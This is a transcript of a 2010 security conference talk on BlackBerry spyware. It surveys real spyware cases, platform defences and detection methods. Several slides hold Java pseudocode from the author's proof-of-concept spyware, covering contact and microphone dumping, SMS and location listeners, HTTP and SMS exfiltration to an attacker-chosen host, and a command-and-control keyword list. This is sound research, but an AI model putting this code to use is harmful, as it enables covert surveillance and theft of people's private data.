SlideShare une entreprise Scribd logo

Shmoocon 2010 - The Monkey Steals the Berries

Tyler Shields
Tyler Shields
TechnologieBusiness
1  sur  51
Blackberry Mobile Spyware The Monkey Steals the Berries Tyler Shields February 5, 2010
Outline  Introduction  Case Studies of Mobile Spyware  Blackberry Security Mechanisms  Installation Methods  Effects and Behaviors  Technical Specifications  Methods of Detection and Future Work  Demonstration © 2010 Veracode, Inc. 2
Presenter Background Currently Sr. Security Researcher, Veracode, Inc. Previously Security Consultant - Symantec Security Consultant - @Stake Incident Response and Forensics Handler – US Government Wishes He Was Infinitely Rich Personal Trainer to hot Hollywood starlets © 2010 Veracode, Inc. 3
Mobile Spyware  Often includes modifications to legitimate programs designed to compromise the device or device data  Often inserted by those who have legitimate access to source code or distribution binaries  May be intentional or inadvertent  Not specific to any particular programming language  Not specific to any particular mobile Operating System © 2010 Veracode, Inc. 4
Attacker Motivation  Practical method of compromise for many systems – Let the users install your backdoor on systems you have no access to – Looks like legitimate software so may bypass mobile AV  Retrieve and manipulate valuable private data – Looks like legitimate application traffic so little risk of detection  For high value targets such as financial services and government it becomes cost effective and more reliable – High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation – Think “Aurora” for Mobile Devices © 2010 Veracode, Inc. 5
Back To The Future © 2010 Veracode, Inc. 6
Back To The Future © 2010 Veracode, Inc. 7
Case Studies of Mobile Spyware © 2010 Veracode, Inc. 8
FlexiSpy  http://www.flexispy.com  $149 - $350 PER YEAR depending on features  Features – Remote Listening – C&C Over SMS – SMS and Email Logging – Call History Logging – Location Tracking – Call Interception – GPS Tracking – Symbian, Blackberry, Windows Mobile Supported © 2010 Veracode, Inc. 9
FlexiSpy Web Site Quotes  “Download FlexiSPY spyphone software directly onto a mobile phone and receive copies of SMS, Call Logs, Emails, Locations and listen to conversations within minutes of purchase. “  “Catch cheating wives or cheating husbands, stop employee espionage, protect children, make automatic backups, bug meetings rooms etc.”  “F Secure seem to think that its ok for them to interfere with legitimate, legal and accountable software. Who appointed them judge, jury and executioner anyway, and why wont they answer our emails, so we have to ask who is the real malware? Here is how to remove FSecure malware from your device. Please don't believe the fsecure fear mongers who simply wish you to buy their products.” © 2010 Veracode, Inc. 10
Mobile Spy  http://www.mobile-spy.com  $49.97 PER QUARTER or $99.97 PER YEAR  Features – SMS Logging – Call Logging – GPS Logging – Web URL Logging – BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian © 2010 Veracode, Inc. 11
Mobile Spy Web Site Quotes  “This high-tech spy software will allow you to see exactly what they do while you are away. Are your kids texting while driving or using the phone in all hours of the night? Are your employees sending company secrets? Do they erase their phone logs?”  “Our software is not for use on a phone you do not own or have proper permission to monitor from the user or owner. You must always follow all applicable laws and regulations in your region.”  “Purchased by more than 30,000 customers in over 150 countries” © 2010 Veracode, Inc. 12
Etisalat (SS8)  Cell carrier in United Arab Emirates (UAE)  Pushed via SMS as “software patch” for Blackberry smartphones  Upgrade urged to “enhance performance” of Blackberry service  Blackberry PIN messaging as C&C  Sets FLAG_HIDDEN bit to true  Interception of outbound email / SMS only  Discovered due to flooded listener server cause retries that drained batteries of affected devices  Accidentally released the .jar as well as the .cod (ooopsie?!) © 2010 Veracode, Inc. 13
Bugs & Phonesnoop  Bugs – Exfiltration of inbound and outbound email – Hidden  PhoneSnoop – Remotely turn on a Blackberry phone microphone – Listen in on target ambient conversation © 2010 Veracode, Inc. 14
Storm8 Phone Number Farming – iMobsters and Vampires Live (and others) – “Storm8 has written the software for all its games in such a way that it automatically accesses, collects, and transmits the wireless telephone number of each iPhone user who downloads any Storm8 game," the suit alleges. " ... Storm8, though, has no reason whatsoever to access the wireless phone numbers of the iPhones on which its games are installed." – “Storm8 says that this code was used in development tests, only inadvertently remained in production builds, and removed as soon as it was alerted to the issue.” – These were available via the iTunes App Store! – http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html © 2010 Veracode, Inc. 15
Symbian Sexy Space – Poses as legitimate server ACSServer.exe – Calls itself 'Sexy Space„ – Steals phone and network information – Exfiltrates data via hacker owned web site connection – Can SPAM contact list members – Basically a “botnet” for mobile phones – Signing process  Anti-virus scan using F-Secure - Approx 43% proactive detection rate (PCWorld)  Random selection of inbound manually assessed – Symbian signed this binary as safe! – http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm © 2010 Veracode, Inc. 16
09Droid – Banking Applications Attack – Droid app that masquerades as any number of different target banking applications – Target banks included  Royal Bank of Canada  Chase  BB&T  SunTrust  Over 50 total financial institutions were affected – May steal and exfiltrate banking credentials – Approved and downloaded from Google’s Android Marketplace! – http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps- market – http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953 – http://www.f-secure.com/weblog/archives/00001852.html © 2010 Veracode, Inc. 17
Blackberry Security Mechanisms © 2010 Veracode, Inc. 18
Blackberry Takes Security Seriously  KB05499: Protecting the BlackBerry smartphone and BlackBerry Enterprise Server against malware http://www.blackberry.com/btsc/search.do?cmd=displayKC&docTyp e=kc&externalId=KB05499  Protecting the BlackBerry device platform against malware http://docs.blackberry.com/en/admin/deliverables/1835/Protecting the BlackBerry device platform against malware.pdf  Placing the BlackBerry Enterprise Solution in a segmented network http://docs.blackberry.com/en/admin/deliverables/1460/Placing_the_ BlackBerry_Enterprise_Solution_in_a_Segmented_Network.pdf  BlackBerry Enterprise Server Policy Reference Guide http://docs.blackberry.com/en/admin/deliverables/7228/Policy_Refer ence_Guide.pdf © 2010 Veracode, Inc. 19
Does It Really Matter?! Only 23% of smartphone owners use the security software installed on the devices. (Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009) 13% of organizations currently protect from mobile viruses (Mobile Security 2009 Survey by Goode Intelligence) © 2010 Veracode, Inc. 20
Code Signing  Subset of Blackberry API considered “controlled”  Use of controlled package, class, or method requires appropriate code signature  Blackberry Signature Tool comes with the Blackberry JDE  Acquire signing keys by filling out a web form and paying $20 – This not is a high barrier to entry – 48 hours later you receive signing keys  Install keys into signature tool © 2010 Veracode, Inc. 21
Code Signing Process  Hash of code sent to RIM for API tracking purposes only  RIM does not get source code  COD file is signed based on required keys  Application ready to be deployed  Easy to acquire anonymous keys © 2010 Veracode, Inc. 22
IT Policies  Requires connection to Blackberry Enterprise Server (BES)  Supersedes lower levels of security restrictions  Prevent devices from downloading third-party applications over wireless  Prevent installation of specific third-party applications  Control permissions of third party applications – Allow Internal Connections – Allow Third-Party Apps to Use Serial Port – Allow External Connections  MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 23
Application Policies  Can be controlled at the BES  If no BES present, controls are set on the handheld itself  Can only be MORE restrictive than the IT policy, never less  Control individual resource access per application  Control individual connection access per application  MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 24
V4.7.0.148 Default 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Browser Filtering Recording Reset Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 25
V5.0.0.328 Default 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 26
V5.0.0.328 Trusted 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 27
Installation Methods © 2010 Veracode, Inc. 28
Installation Methods  Accessing a web site using the BlackBerry Browser and choosing to download the application over the network (OTA Installation)  Running the application loader tool of the BlackBerry Desktop Manager and choosing to download the application onto the BlackBerry device using a physical connection to the computer  Blackberry BES push the application to your user community  Get it into the Blackberry App World and let the user choose to install it for you! © 2010 Veracode, Inc. 29
Installation Files  .COD files: A COD file is a proprietary file format developed by RIM that contains compiled and packaged application code.  .JAD files: An application descriptor that stores information about the application itself and the location of .COD files  .JAR files: a JAR file (or Java ARchive) is used for aggregating many files into one. It is generally used to distribute Java classes and associated metadata.  .ALX files: Similar to the .JAD file, in that it holds information about where the installation files for the application are located © 2010 Veracode, Inc. 30
txsBBSpy Effects and Behaviors © 2010 Veracode, Inc. 31
txsBBSpy Logging and Dumping Monitor connected / disconnected calls Monitor PIM added / removed / updated Monitor inbound SMS Monitor outbound SMS Real Time track GPS coordinates Dump all contacts Dump current location Dump phone logs Dump email Dump microphone capture (security prompted) © 2010 Veracode, Inc. 32
txsBBSpy Exfiltration and C&C Methods SMS (No CDMA) SMS Datagrams (Supports CDMA) Email HTTP GET HTTP POST TCP Socket UDP Socket Command and control hard coded to inbound SMS © 2010 Veracode, Inc. 33
txsBBSpy Technical Specifications © 2010 Veracode, Inc. 34
Technical Methods  Data Dumpers  Listeners  Exfiltration Methods  Command and Control © 2010 Veracode, Inc. 35
Dump Contact Information  API – javax.microedition.pim – net.rim.blackberry.API.pdap  Pseudocode PIM pim = PIM.getInstance(); BlackBerryPIMList contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); Enumeration eContacts = contacts.items(); Contact contact = (Contact) eContacts.nextElement(); if (contacts.isSupportedField(Contact.EMAIL)) { if (contact.countValues(Contact.EMAIL) > 0) email = contact.getString(Contact.EMAIL, 0); } © 2010 Veracode, Inc. 36
Dump Microphone  API – javax.microedition.media.control – javax.microedition.media.manager – javax.microedition.media.player  Pseudocode Player p = Manager.createPlayer("capture://audio"); RecordControl rc = (RecordControl)p.getControl("RecordControl"); ByteArrayOutputStream os = new ByteArrayOutputStream(); rc.setRecordStream(os); rc.startRecord(); © 2010 Veracode, Inc. 37
Location Listener  Create the class that implements LocationListener Interface  Get LocationProvider instance  Add LocationListener  API – javax.microedition.location.LocationProvider.getInstance – javax.microedition.location.LocationProvider.setLocationListener  Pseudocode ll = new LocListener(); lp = LocationProvider.getInstance(null); lp.setLocationListener(ll, 1, 1, 1); © 2010 Veracode, Inc. 38
SMS Outbound Listener  Create class that implements “SendListener” interface  Add the SendListener  API – net.rim.blackberry.api.sms.SMS – javax.wireless.messaging.TextMessage  Pseudocode sl = new SMSOUTListener(); SMS.addSendListener(sl); © 2010 Veracode, Inc. 39
PIM Listener  Create the class that implements PIMListListener Interface  Open Target PIMList and Add PIMListListener  API – javax.microedition.pim.PIM.getInstance() – net.rim.blackberry.api.pdap.BlackBerryPIMList.addListener  Pseudocode pl = new PhoneLogger(); pim = PIM.getInstance(); contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); contacts.addListener(piml); © 2010 Veracode, Inc. 40
SMS Datagram Exfiltration  API – javax.microedition.io.Connector – javax.microedition.io.DatagramConnection – javax.microedition.io.Datagram  Pseudocode DatagramConnection dc = (DatagramConnection)Connector.open("sms://"+this.pnum+":3590 "); Datagram d = dc.newDatagram(dc.getMaximumLength()); byte[] buf = msg.getBytes(); d.setData(buf, 0, buf.length); d.write(buf, 0, buf.length); dc.send(d); © 2010 Veracode, Inc. 41
HTTP Get/Post Exfiltration  API – javax.microedition.io.Connector – javax.microedition.io.HttpConnection  Pseudocode c = (HttpConnection)Connector.open("http://"+this.url+"/“+msg); rc = c.getResponseCode(); if (rc != HttpConnection.HTTP_OK) { c.setRequestMethod(HttpConnection.POST); c.setRequestProperty("User-Agent", "BBSpyware|"+msg); c.setRequestProperty("Content-Language", "en-US"); os = c.openOutputStream(); os.write(msg.getBytes()); © 2010 Veracode, Inc. 42
Threaded Exfiltration  Listener based exfiltration methods use separate thread  Doesn‟t freeze UI interface  Queues messages outbound if network is slow  ThreadedSend extends Thread class  Uses run() method to call exfiltrate() © 2010 Veracode, Inc. 43
Command and Control  initCandC(int a) – Initializes inbound SMS listener if passed a == 1 – Kills spyware otherwise – Listens for commands and acts accordingly TXSDIE TXSPHLON TXSPHLOFF TXSPIMON TXSPIMOFF TXSSLINON TXSSLINOFF TXSSLOUTON TXSSLOUTOFF TXSGLON TXSGLOFF TXSEXFILSMS TXSEXFILSMSDG TXSEXFILEMAIL TXSEXFILGET TXSEXFILPOST TXSEXFILTCP TXSEXFILUDP TXSDUMPCON TXSDUMPGPS TXSDUMPPL TXSDUMPEMAIL TXSDUMPMIC TXSIP:[IP] TXSEM:[EMAIL] TXSPORT[PORT] TXSPHONE:[PN] TXSURL[URL] TXSGTIME:[N] TXSPING © 2010 Veracode, Inc. 44
Methods of Detection and Future Work © 2010 Veracode, Inc. 45
Methods of Detection  Additional Operating System Prompts – Remove the “Trust Application” prompt requiring individual configuration  Signature Based – This is how the current anti-virus world is failing  Sandbox Based Execution Heuristics – Still requires execution in a sandbox and is reactive – Can‟t ensure complete execution  Static Decompilation and Analysis – Enumeration of sources of sensitive taint and exfiltration sinks – Control/Data flow mapping for tracing sensitive taint from source to sink – Compare findings against expected values © 2010 Veracode, Inc. 46
Future Work (Offensive AND Defensive)  Reverse engineer .cod file format  Continued research into unobstructed installation methods (requires exploitation)  Infect PC with virus that acts as distribution hub  Research additional exfiltration methods for tunneling without prompting © 2010 Veracode, Inc. 47
Demonstration © 2010 Veracode, Inc. 48
Conclusion  Mobile spyware is trivial to write  Minimal methods of real time eradication or detection of spyware type activities  Security model of mobile platforms too loose  No easy/automated way to confirm for ourselves what the applications are actually doing  We are currently trusting the vendor application store provider for the majority of our mobile device security © 2010 Veracode, Inc. 49
The Monkey Steals the Berries! Questions? © 2010 Veracode, Inc. 50
Questions?

Recommandé

IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?Tyler Shields
 
Les 10 risques liés aux applications mobiles
Les 10 risques liés aux applications mobilesLes 10 risques liés aux applications mobiles
Les 10 risques liés aux applications mobilesBee_Ware
 
Securing hand held computing devices
Securing hand held computing devicesSecuring hand held computing devices
Securing hand held computing devicesjraja01
 
BETTER- Threat Whitepaper- PoS
BETTER- Threat Whitepaper- PoSBETTER- Threat Whitepaper- PoS
BETTER- Threat Whitepaper- PoSPurna Bhat
 
(Pdf) yury chemerkin hacktivity_2013
(Pdf) yury chemerkin hacktivity_2013(Pdf) yury chemerkin hacktivity_2013
(Pdf) yury chemerkin hacktivity_2013STO STRATEGY
 
ANDROID SECURITY
ANDROID SECURITYANDROID SECURITY
ANDROID SECURITYyogeshraut090
 
Evolutionand impactofhiddenmobilethreats wandera
Evolutionand impactofhiddenmobilethreats wanderaEvolutionand impactofhiddenmobilethreats wandera
Evolutionand impactofhiddenmobilethreats wanderaAnjoum .
 
Top 6-Security-Threats-on-iOS
Top 6-Security-Threats-on-iOSTop 6-Security-Threats-on-iOS
Top 6-Security-Threats-on-iOSInnovation Network Technologies: InNet
 

Recommandé

IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?Tyler Shields
 
Les 10 risques liés aux applications mobiles
Les 10 risques liés aux applications mobilesLes 10 risques liés aux applications mobiles
Les 10 risques liés aux applications mobilesBee_Ware
 
Securing hand held computing devices
Securing hand held computing devicesSecuring hand held computing devices
Securing hand held computing devicesjraja01
 
BETTER- Threat Whitepaper- PoS
BETTER- Threat Whitepaper- PoSBETTER- Threat Whitepaper- PoS
BETTER- Threat Whitepaper- PoSPurna Bhat
 
(Pdf) yury chemerkin hacktivity_2013
(Pdf) yury chemerkin hacktivity_2013(Pdf) yury chemerkin hacktivity_2013
(Pdf) yury chemerkin hacktivity_2013STO STRATEGY
 
ANDROID SECURITY
ANDROID SECURITYANDROID SECURITY
ANDROID SECURITYyogeshraut090
 
Evolutionand impactofhiddenmobilethreats wandera
Evolutionand impactofhiddenmobilethreats wanderaEvolutionand impactofhiddenmobilethreats wandera
Evolutionand impactofhiddenmobilethreats wanderaAnjoum .
 
Top 6-Security-Threats-on-iOS
Top 6-Security-Threats-on-iOSTop 6-Security-Threats-on-iOS
Top 6-Security-Threats-on-iOSInnovation Network Technologies: InNet
 
Security News bytes October 2013
Security News bytes October 2013Security News bytes October 2013
Security News bytes October 2013n|u - The Open Security Community
 
Protect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacksProtect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacksRohan Fernandes
 
SmartCard Forum 2011 - Evolution of authentication market
SmartCard Forum 2011 - Evolution of authentication marketSmartCard Forum 2011 - Evolution of authentication market
SmartCard Forum 2011 - Evolution of authentication marketOKsystem
 
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyPraetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyTyler Shields
 
10940 img sytr12_mobile_malware
10940 img sytr12_mobile_malware10940 img sytr12_mobile_malware
10940 img sytr12_mobile_malwareSytelReplyUK
 
(Pdf) yury chemerkin _ath_con_2013
(Pdf) yury chemerkin _ath_con_2013(Pdf) yury chemerkin _ath_con_2013
(Pdf) yury chemerkin _ath_con_2013STO STRATEGY
 
afam_portfolio
afam_portfolioafam_portfolio
afam_portfolioOkonkwo Afam
 
(Pdf) yury chemerkin hackfest.ca_2013
(Pdf) yury chemerkin hackfest.ca_2013(Pdf) yury chemerkin hackfest.ca_2013
(Pdf) yury chemerkin hackfest.ca_2013STO STRATEGY
 
Make Mobilization Work - Properly Implementing Mobile Security
Make Mobilization Work - Properly Implementing Mobile SecurityMake Mobilization Work - Properly Implementing Mobile Security
Make Mobilization Work - Properly Implementing Mobile SecurityMichael Davis
 
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016Subho Halder
 
Securing Mobile Apps - Appfest Version
Securing Mobile Apps - Appfest VersionSecuring Mobile Apps - Appfest Version
Securing Mobile Apps - Appfest VersionSubho Halder
 
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...CloudIDSummit
 
TheGRID - Stop Identity Theft
TheGRID - Stop Identity TheftTheGRID - Stop Identity Theft
TheGRID - Stop Identity Thefte-Lock Corporation
 
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CloudIDSummit
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Securitycclark_isec
 
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...Face expressions, facial features, kinect sensor, face tracking SDK, neural n...
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...iosrjce
 
Authshield integration with mails
Authshield integration with mailsAuthshield integration with mails
Authshield integration with mailsAuthShield Labs
 
Botnet
BotnetBotnet
Botnetlokenra
 
Enterprise Mobile Security
Enterprise Mobile SecurityEnterprise Mobile Security
Enterprise Mobile SecurityHP Enterprise Security
 
Eating in the school cafeteria
Eating in the school cafeteriaEating in the school cafeteria
Eating in the school cafeteriasanjuktasharma
 
School Cafeteria Point-of-Sale
School Cafeteria Point-of-SaleSchool Cafeteria Point-of-Sale
School Cafeteria Point-of-SaleScholarChip ☁ Tools for Smarter Schools
 
School cafeteria 4
School cafeteria 4School cafeteria 4
School cafeteria 4parksandtrees
 

Contenu connexe

Tendances

Protect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacksProtect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacksRohan Fernandes
 
SmartCard Forum 2011 - Evolution of authentication market
SmartCard Forum 2011 - Evolution of authentication marketSmartCard Forum 2011 - Evolution of authentication market
SmartCard Forum 2011 - Evolution of authentication marketOKsystem
 
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyPraetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyTyler Shields
 
10940 img sytr12_mobile_malware
10940 img sytr12_mobile_malware10940 img sytr12_mobile_malware
10940 img sytr12_mobile_malwareSytelReplyUK
 
(Pdf) yury chemerkin _ath_con_2013
(Pdf) yury chemerkin _ath_con_2013(Pdf) yury chemerkin _ath_con_2013
(Pdf) yury chemerkin _ath_con_2013STO STRATEGY
 
(Pdf) yury chemerkin hackfest.ca_2013
(Pdf) yury chemerkin hackfest.ca_2013(Pdf) yury chemerkin hackfest.ca_2013
(Pdf) yury chemerkin hackfest.ca_2013STO STRATEGY
 
Make Mobilization Work - Properly Implementing Mobile Security
Make Mobilization Work - Properly Implementing Mobile SecurityMake Mobilization Work - Properly Implementing Mobile Security
Make Mobilization Work - Properly Implementing Mobile SecurityMichael Davis
 
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016Subho Halder
 
Securing Mobile Apps - Appfest Version
Securing Mobile Apps - Appfest VersionSecuring Mobile Apps - Appfest Version
Securing Mobile Apps - Appfest VersionSubho Halder
 
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...CloudIDSummit
 
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CloudIDSummit
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Securitycclark_isec
 
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...Face expressions, facial features, kinect sensor, face tracking SDK, neural n...
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...iosrjce
 
Authshield integration with mails
Authshield integration with mailsAuthshield integration with mails
Authshield integration with mailsAuthShield Labs
 

Tendances (19)

Security News bytes October 2013
Security News bytes October 2013Security News bytes October 2013
Security News bytes October 2013
 
Protect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacksProtect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacks
 
SmartCard Forum 2011 - Evolution of authentication market
SmartCard Forum 2011 - Evolution of authentication marketSmartCard Forum 2011 - Evolution of authentication market
SmartCard Forum 2011 - Evolution of authentication market
 
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyPraetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile Privacy
 
10940 img sytr12_mobile_malware
10940 img sytr12_mobile_malware10940 img sytr12_mobile_malware
10940 img sytr12_mobile_malware
 
(Pdf) yury chemerkin _ath_con_2013
(Pdf) yury chemerkin _ath_con_2013(Pdf) yury chemerkin _ath_con_2013
(Pdf) yury chemerkin _ath_con_2013
 
afam_portfolio
afam_portfolioafam_portfolio
afam_portfolio
 
(Pdf) yury chemerkin hackfest.ca_2013
(Pdf) yury chemerkin hackfest.ca_2013(Pdf) yury chemerkin hackfest.ca_2013
(Pdf) yury chemerkin hackfest.ca_2013
 
Make Mobilization Work - Properly Implementing Mobile Security
Make Mobilization Work - Properly Implementing Mobile SecurityMake Mobilization Work - Properly Implementing Mobile Security
Make Mobilization Work - Properly Implementing Mobile Security
 
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
Outsmarting Hackers before your App gets Hacked - iOS Conf SG 2016
 
Securing Mobile Apps - Appfest Version
Securing Mobile Apps - Appfest VersionSecuring Mobile Apps - Appfest Version
Securing Mobile Apps - Appfest Version
 
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...
CIS 2015 Mobile Security, Identity & Authentication: Reasons for Optimism - R...
 
TheGRID - Stop Identity Theft
TheGRID - Stop Identity TheftTheGRID - Stop Identity Theft
TheGRID - Stop Identity Theft
 
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
 
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...Face expressions, facial features, kinect sensor, face tracking SDK, neural n...
Face expressions, facial features, kinect sensor, face tracking SDK, neural n...
 
Authshield integration with mails
Authshield integration with mailsAuthshield integration with mails
Authshield integration with mails
 
Botnet
BotnetBotnet
Botnet
 
Enterprise Mobile Security
Enterprise Mobile SecurityEnterprise Mobile Security
Enterprise Mobile Security
 

En vedette

Eating in the school cafeteria
Eating in the school cafeteriaEating in the school cafeteria
Eating in the school cafeteriasanjuktasharma
 
PR Plan for School Cafeteria (Yonsei Univ. Korea)
PR Plan for School Cafeteria (Yonsei Univ. Korea)PR Plan for School Cafeteria (Yonsei Univ. Korea)
PR Plan for School Cafeteria (Yonsei Univ. Korea)thenightinseoul
 
PPT on Canteen project - Strategic Management- shubham-Saraswatbba-2012
PPT on Canteen project - Strategic Management- shubham-Saraswatbba-2012PPT on Canteen project - Strategic Management- shubham-Saraswatbba-2012
PPT on Canteen project - Strategic Management- shubham-Saraswatbba-2012Shubham Parsekar
 
Canteen management system
Canteen management systemCanteen management system
Canteen management systemRITESH HELONDE
 
Canteen management system of “himalayan academy” sapana
Canteen management system of “himalayan academy” sapanaCanteen management system of “himalayan academy” sapana
Canteen management system of “himalayan academy” sapanaNawaraj Ghimire
 
Canteen project
Canteen projectCanteen project
Canteen projectjmilne7
 
a study of the facilities given by the canteens and its efect on student sati...
a study of the facilities given by the canteens and its efect on student sati...a study of the facilities given by the canteens and its efect on student sati...
a study of the facilities given by the canteens and its efect on student sati...Ritesh Gholap (Digital Ritesh)
 
Canteen Management System
Canteen Management SystemCanteen Management System
Canteen Management Systemlissapenas123
 

En vedette (12)

Eating in the school cafeteria
Eating in the school cafeteriaEating in the school cafeteria
Eating in the school cafeteria
 
School Cafeteria Point-of-Sale
School Cafeteria Point-of-SaleSchool Cafeteria Point-of-Sale
School Cafeteria Point-of-Sale
 
School cafeteria 4
School cafeteria 4School cafeteria 4
School cafeteria 4
 
PR Plan for School Cafeteria (Yonsei Univ. Korea)
PR Plan for School Cafeteria (Yonsei Univ. Korea)PR Plan for School Cafeteria (Yonsei Univ. Korea)
PR Plan for School Cafeteria (Yonsei Univ. Korea)
 
PPT on Canteen project - Strategic Management- shubham-Saraswatbba-2012
PPT on Canteen project - Strategic Management- shubham-Saraswatbba-2012PPT on Canteen project - Strategic Management- shubham-Saraswatbba-2012
PPT on Canteen project - Strategic Management- shubham-Saraswatbba-2012
 
Canteen management system
Canteen management systemCanteen management system
Canteen management system
 
Canteen management system of “himalayan academy” sapana
Canteen management system of “himalayan academy” sapanaCanteen management system of “himalayan academy” sapana
Canteen management system of “himalayan academy” sapana
 
Canteen management
Canteen managementCanteen management
Canteen management
 
Canteen project
Canteen projectCanteen project
Canteen project
 
a study of the facilities given by the canteens and its efect on student sati...
a study of the facilities given by the canteens and its efect on student sati...a study of the facilities given by the canteens and its efect on student sati...
a study of the facilities given by the canteens and its efect on student sati...
 
Canteen Management System
Canteen Management SystemCanteen Management System
Canteen Management System
 
Canteen management system
Canteen management systemCanteen management system
Canteen management system
 

Similaire à Shmoocon 2010 - The Monkey Steals the Berries

ISACA CACS 2012 - Mobile Device Security and Privacy
ISACA CACS 2012 - Mobile Device Security and PrivacyISACA CACS 2012 - Mobile Device Security and Privacy
ISACA CACS 2012 - Mobile Device Security and PrivacyMichael Davis
 
The Consumerisation of Corporate IT
The Consumerisation of Corporate ITThe Consumerisation of Corporate IT
The Consumerisation of Corporate ITPeter Wood
 
2010: Mobile Security - WHYMCA Developer Conference
2010: Mobile Security - WHYMCA Developer Conference2010: Mobile Security - WHYMCA Developer Conference
2010: Mobile Security - WHYMCA Developer ConferenceFabio Pietrosanti
 
Securing Mobile Banking Apps - You Are Only as Strong as Your Weakest Link
Securing Mobile Banking Apps - You Are Only as Strong as Your Weakest LinkSecuring Mobile Banking Apps - You Are Only as Strong as Your Weakest Link
Securing Mobile Banking Apps - You Are Only as Strong as Your Weakest LinkIBM Security
 
Can You Steal From Me Now? Mobile and BYOD Security Risks
Can You Steal From Me Now? Mobile and BYOD Security RisksCan You Steal From Me Now? Mobile and BYOD Security Risks
Can You Steal From Me Now? Mobile and BYOD Security RisksMichael Davis
 
Building a Mobile App Pen Testing Blueprint
Building a Mobile App Pen Testing BlueprintBuilding a Mobile App Pen Testing Blueprint
Building a Mobile App Pen Testing BlueprintNowSecure
 
Sholove cyren web security - technical datasheet2
Sholove cyren web security - technical datasheet2Sholove cyren web security - technical datasheet2
